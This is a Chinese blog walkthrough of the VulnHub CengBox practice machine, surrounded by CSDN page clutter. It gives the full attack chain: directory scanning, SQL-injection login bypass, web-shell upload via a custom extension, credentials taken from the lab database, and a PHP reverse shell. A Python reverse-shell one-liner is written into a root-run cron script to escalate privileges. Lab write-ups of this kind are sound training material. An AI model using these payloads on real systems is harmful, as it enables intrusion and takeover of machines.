vulnhub靶机-cengbox

最新推荐文章于 2024-06-28 10:07:42 发布
最新推荐文章于 2024-06-28 10:07:42 发布
阅读量1.2k 收藏 1
点赞数 1
分类专栏: vulnhub靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43784056/article/details/106930443
版权

1、使用netdiscover扫描一下靶机ip:192.168.0.107

2、nmap扫描一下目标开放端口:22、80

3、访问80端口,没什么有用的信息,直接用kali自带的dirb扫描目录

dirb http://192.168.0.107 /usr/share/wordlists/dirb/big.txt

4、看着masteradmin和uploads两个目录有点可疑,猜测masteradmin应该是管理后台,uploads应该是个保存上传文件的目录,应该是需要上传文件,两个直接访问都是403,所以进一步扫描masteradmin目录下的页面

dirb http://192.168.0.107/masteradmin -X .php

5、一共扫描出了三个文件,db.php--猜测应该是存放连接数据库的信息,login.php,upload.php--应该是上传界面,应该就是要访问这个界面了,直接访问提示需要登录,跳转到login.php

6、看到这种输入框,先测试一下万能密码和弱口令,发现admin'or 1#成功登录,所以这里是存在sql注入的,可以使用sql注入出用户名和密码

后台账号密码masteradmin/C3ng0v3R00T1!

7、进入后台之后,需要我们上传一个文件,选择一个木马文件上传,表面没有什么提示,其实使用ctrl+a全选,就能看到提示信息,说需要上传一个ceng文件,也可以使用burp的重放功能

于是将文件名修改成shell.ceng重新上传

8、这里只是提示success,没有说保存路径,猜测是之前的uploads目录,访问之后是一片空白,猜测被当成php成功解析,传个参进去发现执行成功,这里猜测应该是有个.htaccess文件做了配置

9、直接蚁剑连接,可以查看下有没有.htaccess文件证实一下猜想,发现确实是有,而且内容也是将ceng后缀解析成php格式

10、其他的就没有发现什么有用的信息,于是想到之前的db.php文件,试着进入数据库看一下

mysql数据库账号密码:root/SuperS3cR3TPassw0rd1!

11、这里直接使用蚁剑的虚拟终端连接加密码,会出现警告,说密码不能直接在命令行,MySQL 5.6 版本对安全性进行了增强,如果在命令中使用了 -ppassword ,就会有告警提示。

mysql -uroot -pSuperS3cR3TPassw0rd1!

于是替换成

mysql -uroot -p

这样还是不行,会报错

想要提权到tty试试,但是蚁剑的虚拟终端似乎不行

12、反弹shell再试试,用蚁剑上传php-reverse-shell.php,kali开启监听,访问页面,成功反弹shell

http://192.168.0.107/uploads/php-reverse-shell.php

python没有,使用python3提权

python3 -c "import pty;pty.spawn('/bin/bash')"

13、再次尝试连接一下mysql数据库,成功连接,这里虽然弹出警告,但是还是能够连接成功,说明之前应该只是不能输出这个结果

14、查看一下数据库和表,cengbox数据库的admin表,也就是我们之前sql注入出的数据

15、尝试一下使用这个密码登录,所以需要登录的用户名

cat /etc/passwd|grep /bin/bash
root
cengover

16、尝试之后使用cengover/C3ng0v3R00T1!成功登录,可以直接在这里su cengover切换,但是这个体验感极差,可以使用ssh登录

查看下家目录下有没有什么提示性的文件,就一个user.txt文件,也没给什么信息,也没有找到可以提权的命令

17、这里需要使用pspy64查看后台进程

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64

发现有个可以的进程,uid=0(root)执行/opt/md5check.py文件

18、修改该文件内容为反弹shell的脚本,本地开启监听,稍等一会就能接收到反弹的shell

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.109",5555));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' > /opt/md5check.py

查看root.txt文件,大功告成

19、记录一些小工具:

pspy64
revshellgen
sqlmap burpsuite co2

下一篇写cengbox2

0ne_
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pspy:在没有root权限的情况下监视linux进程
03-31
pspy-无特权Linux进程监听 pspy是一种命令行工具,旨在无需根权限就可以窥探进程。 它允许您在其他用户执行命令时查看它们,cron作业等。 非常适合枚举CTF中Linux系统。 很好地向您的同事展示为什么在命令行中将秘密作为参数传递是一个坏主意。 该工具从procfs扫描中收集信息。 放置在文件系统选定部分上的Inotify观察程序将触发这些扫描,以捕获短暂的进程。 入门 下载 将工具安装到要检查Linux机器上。 首先获取二进制文件。 在此处下载发布的二进制文件: 32位大,静态版本: pspy32 64位大,静态版本: pspy64 32位小版本: pspy32s 64位小版本: pspy64s 静态编译的文件应可在任何Linux系统上使用,但容量很大(〜4MB)。 如果有大小问题,请尝试较小的版本,该版本取决于libc并使用UPX(〜1MB)压缩。 建造 您可以使用系
CengBoxV1渗透笔记】
勿山几已
03-20 275
记录vulnhub靶场CengBoxV1的渗透过程
Vulnhub靶机-PumpkinFestival
最新发布
ergeLXT的博客
06-28 640
需要修改本地hosts文件之后进行访问,添加pumpkins.local到hosts文件之后访问。使用 echo 命令创建一个名为alohomora的文件,其中复制了/bin/bash。本机尝试,在本机ftp登录靶机,拿到data,解压,解密到key(2)文件,然后ssh登录。登录名为admin的wp-admin用户,在得到令牌二的时候获取到一个关键字。在上面的目录中除token.txt之外,还有一个NOOOOO目录,继续访问。有一个NO目录,继续访问,经过多次遍历,找到token.txt。
cengbox1靶机
小小猪的博客
07-03 284
cengbox1靶机 arp-scan -l 扫描靶机IP地址 nmap -sV -Pn -A x.x.x.136 扫描端口信息 访问80端口 对80端口进行爆破 发现登录界面 进行burp抓包 进行sqlmap爆破,sqlmap -r 4.txt --dbs,爆破出数据库 爆破出表 爆破出列 爆破出用户名和密码 登录,发现上传点 只能上传图片 制造后门 上传成功 msf进行监听 访问上传文件,反弹.
看完这篇 教你玩转渗透测试靶机vulnhub——EvilBox-One
Aluxian_的博客
07-15 5496
Vulnhub靶机Web1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 老样子需要找到flag即可。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/evilbox/EvilBox—One.ova
Vulnhub靶机渗透之环境搭建及JIS-CTF入门
qq_61702710的博客
07-15 2446
写道这里,这篇文章讲解完毕,后续会更深入的分享。netdiscover 用于发现目标ipnmap进行端口扫描dirb进行目录扫描敏感文件获取及分析php木马生成和蚁剑工具ssh远程连接sudo提权数据库脱裤相关内容整理于网上,侵权删。
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Linux系统监控工具详解
3369的博客
09-26 484
系统监控: proc文件系统: proc文件系统是一种无存储的文件系统,当读其中的文件时,其内容动态生成,当写文件时,文件所关联的写函数被调用。每个proc文件都关联着字节特定的读写函数,因而它提供了另外的一种和内核通信的机制:内核部件可以通过该文件系统向用户空间提供接口来提供查询信息、修改软件行为,因而它是一种比较重要的特殊文件系统 由于proc文件系统以文件的形式向用户空间提供了访问接口,这些接口可以用于在运行时获取相关部件的信息或者修改部件的行为,因而它是非常方便的一个接口。内核中大量使用了该文件系统
CengBox3渗透笔记
勿山几已
03-31 456
这是cengbox系列靶机的第三个,也就是最后一个,这三个靶机难度恰好覆盖简单、中等、困难不同阶段,都做一下能感受到不同难度靶机的情况。
Meta靶机
weixin_45007073的博客
02-28 1579
信息收集 发现目标主机只开放了ssh和web服务
看完这篇 教你玩转渗透测试靶机vulnhub—Corrosion:2
Aluxian_的博客
06-26 1206
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。Medium这个靶机难度中偏上 因为比较麻烦1.信息收集获取ip地址 和端口信息web等 查看F12源码信息2.文件包含漏洞,包含日志文件ssh写入木马ssh ''@靶机(新知识点!3.nc反弹shell(这里要使用url编码)zip2john爆破和fcrackzip。
djinn3 vulnhub 靶机渗透
mrwangtw的博客
01-21 3152
靶机ip10.0.2.45,攻击机ip10.0.2.4 扫描靶机端口 进入80端口,没发现什么可用的信息 进入5000端口,这里查看所有的title内容,没发现什么可用的信息,看了大佬的博客,发现可用的用户guest 访问31337端口,发现 考虑有nc命令访问端口,发现可用guest去登录,密码也是guest 这里发现这里增加和删除的ticket就是5000端口的内容 反复测试发现存在ssti漏洞 这里是判断ssti模板引擎的方法,具体内容在这...
vulhub靶场搭建与使用
剁椒鱼头没剁椒的博客
11-26 1万+
本来是不想安装yum源的,但是在安装到Docker-compose的时候发现下载特别慢,然后搜了教程看了一下,说可以快一点,结果发现越弄越复杂,只能说一些教程并不适合自己,这里就按照教程上部分内容来。至于yum源部分,我觉得直接跳过吧,使用Vulhub上一键安装docket,可以直接跳到安装docker-compose,并且一键安装也就几分钟,而这个配置yum源,光更新就花费了十几分钟,至少对于我只是配置一个靶场系统,来说多此一举,也不准备拿这个靶场做其他的事,单单就是一个靶场,所以用处大。
vulhub靶场搭建及漏洞复现教程
热门推荐
Cwillchris的博客
03-25 2万+
准备一个纯净的ubantu系统 1、先更新一下安装列表 sudo apt-get update 2、安装docker.io sudo apt install docker.io 查看是否安装成功 docker -v 3、查看是否安装pip pip -V 检测到未安装,提示是否安装,按y下载 再次输入pip -V查看是否安装成功 4、安装docker-compose pip install docker-compose 查看是否安装成功 docker
Vulnhub靶机渗透学习——DC-9
qq_45612828的博客
07-02 3049
Vulnhub靶机渗透学习——DC-9
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值